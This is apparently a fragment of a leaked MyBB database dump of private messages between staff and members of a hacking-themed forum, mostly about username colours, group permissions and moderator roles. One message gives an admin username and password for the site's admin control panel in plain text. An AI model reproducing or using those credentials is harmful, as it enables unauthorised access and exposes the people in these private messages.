'[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. ', '1345941986', '0', '3', '1345995669', '1', '0', '0', '1345943215'); INSERT INTO mybb_privatemessages VALUES('728', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude', '0', 'It would be no e if you told me we where upgrading someone to mod....', '1345950749', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('730', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Access', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nI need your new info to access ACP. The secret pin is the same. \r\n[/quote]\r\n\r\nYou mean my user and pass?\r\n[/quote]\r\n\r\nYup, for the popup of the l33thacking.com:80 \r\n[/quote]\r\npoopipie\r\nsosecret32\r\n', '1345951029', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('741', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'ey', '0', 'Have you done my site yet?', '1345988482', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('745', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)', '1345995669', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('754', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Name color', '0', '[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n\r\nI will talk it out with my staff and let you know. ', '1346015059', '0', '1', '0', '1', '0', '0', '1346027746'); INSERT INTO mybb_privatemessages VALUES('758', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'I like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? \r\n[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n[/quote]', '1346026363', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('760', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n\r\nDoesn\'t matter for me :p\r\n[/quote]', '1346027679', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('788', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'I understand I was just a little annoyed :3 when are you getting back?\r\n[quote=\'t3h jok3r\']\r\nNvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. \r\n\r\n[quote=\'Apathy\']\r\nI like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? \r\n[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1346092008', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('793', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\']\r\nI dislike you. \r\n[/quote]\r\nYea?', '1346099640', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('797', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Also', '0', 'Do to think I was serious? I was going to remove it.... Also the Fu was not serious either.', '1346099758', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('799', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'Your my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3\r\n[quote=\'t3h jok3r\']\r\nMy flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA.\r\n\r\nI will be in USA around Sunday night. \r\n\r\nI understand how you feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. \r\n[quote=\'Apathy\']\r\nI understand I was just a little annoyed :3 when are you getting back?\r\n[quote=\'t3h jok3r\']\r\nNvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. \r\n\r\n[quote=\'Apathy\']\r\nI like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? \r\n[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1346100016', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('802', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', '\r\nAight Sounds good and usertitle? Also I think iPod is a good user but I am not sure what to do he does not like me and thinks I am a shit admin by the way he acts.\r\n[quote=\'t3h jok3r\']\r\nOh OK. My bad for misunderstanding you. I understand what happened now. \r\n\r\nI can\'t use Skype till I reach USA, by the way why didn\'t you change the usertitle? \r\n[quote=\'Apathy\']\r\nYour my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3\r\n[quote=\'t3h jok3r\']\r\nMy flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA.\r\n\r\nI will be in USA around Sunday night. \r\n\r\nI understand how you feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. \r\n[quote=\'Apathy\']\r\nI understand I was just a little annoyed :3 when are you getting back?\r\n[quote=\'t3h jok3r\']\r\nNvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. \r\n\r\n[quote=\'Apathy\']\r\nI like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? \r\n[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1346100416', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('806', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Name color', '0', 'Sorry I am a little confused of everything you said.\r\n[quote=\'t3h jok3r\']\r\nNope, he is just worried that why do you hate him. I said because I took some decisions without his concern.\r\n\r\nAlso remember the advertising PM on HF in which you have to change your username. \r\n\r\n[quote=\'Apathy\']\r\n\r\nAight Sounds good and usertitle? Also I think iPod is a good user but I am not sure what to do he does not like me and thinks I am a shit admin by the way he acts.\r\n[quote=\'t3h jok3r\']\r\nOh OK. My bad for misunderstanding you. I understand what happened now. \r\n\r\nI can\'t use Skype till I reach USA, by the way why didn\'t you change the usertitle? \r\n[quote=\'Apathy\']\r\nYour my friend lol I just want to talk I like skype more then pm. Also iPod does not like me:3 I was kidding and he thinks I am serious. He called you a amazing admin and I had not seen your post so I was like thanks and to me it seemed he responded rudely saying not you. So I said I am sad or something Fuck you. :) but I was not serious and he is like pmsing and I negged him saying I was sad(was going to remove it in like half an hour. But then he goes from + to - on me and pms me \"I do not like you\" yea. :3\r\n[quote=\'t3h jok3r\']\r\nMy flight is on Saturday, 3 PM in SA which I believe is around 4 AM in the morning in USA.\r\n\r\nI will be in USA around Sunday night. \r\n\r\nI understand how you feel, because if I were you, I might be the same. Today I got a bit pissed off when you told me to come on Skype in a post. I for a moment thought you are making it public. \r\n[quote=\'Apathy\']\r\nI understand I was just a little annoyed :3 when are you getting back?\r\n[quote=\'t3h jok3r\']\r\nNvm also I sent you a PM on Skype, if it didn\'t get sent properly it\'s not my fault. We have a huge time difference at the moment because I\'m in another country so I can\'t wait 24-48 hours for each thing, I\'m sure you understand what I\'m on about. \r\n\r\n[quote=\'Apathy\']\r\nI like the red name it was hard to understand what that guy was saying. Also why did you not ask me before making more mods? I though we were a team? \r\n[quote=\'t3h jok3r\']\r\nRead the message below and do you think I should change the username color or not? \r\n\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'HoverCatz\']\r\nHey, y is my name color the same as Members? O.o Change it to something that isnt in use, Orange if it looks baws\r\n[/quote]\r\n\r\nSorry, we removed it. The reason is our number of upgrades would decrease as people would only join groups if they want a colorized username. \r\n[/quote]\r\n\r\nSorry im a bit confused. Removed wut o.o\r\nOh btw im gonna donate 50$ to the forums soon\r\n[/quote]\r\n\r\nWe changed the username color to cyan because we would like people to join groups for the sake of being in it not for a different username color and the number of upgrades would also decrease.\r\n\r\nThanks, we would highly appreciate your donation.\r\n\r\n[/quote]\r\n\r\nBut the group Coders is locked, means u need to Ask me for permission to join. I never accept random people. i watch their posts before any acception. NXK randomly joined, and i didnt need to accept (idk why)\r\n[/quote]\r\n\r\nThat\'s correct, when I re-added the group after the error msg I sent you, I mistakenly left the permission where people can join anytime. You can remove him anytime you want to.\r\n\r\nTrue, but it also concerns upgrades. Sorry, it\'s a decision of the LH staff. \r\n\r\nNow the group is locked, you can moderate requests and more. Also would you like a custom forum? \r\n[/quote]\r\n\r\nOkay.\r\nAbout the custom forum, what about the Coding section thing, May i be a Mod of that?\r\n[/quote]\r\n\r\nI can\'t really take a decision on this one, it\'s because we have too many mods already and you only have 2 posts under the coding tab. \r\n\r\nWe can make you a private coding forum for the Coders group, which you would be moderating. \r\n[/quote]\r\n\r\nIsnt 2 forums about Coding 1 too much? :/ Ill just wait then until u get more posts and more Rep\r\n[/quote]\r\n\r\nI\'m kinda confused with what you meant by \"Isnt 2 forums about Coding 1 too much? \"\r\n\r\n\r\n[/quote]\r\n\r\nSorry im hard to understand, havent slept for 40+ hours. I think its time for bed. Ill reply when i wake up and can think clear :)\r\n[/quote]\r\n\r\nIt\'s cool, good night. \r\n[/quote]\r\n\r\nHey. Can you change the Coders color to the same as Elite as i will only accept Elite members :)\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1346101350', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('822', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Also', '0', '[quote=\'iTzIpod\']\r\n[quote=\'Apathy\']\r\nDo to think I was serious? I was going to remove it.... Also the Fu was not serious either.\r\n[/quote]\r\n\r\nI don\'t care. I still dislike 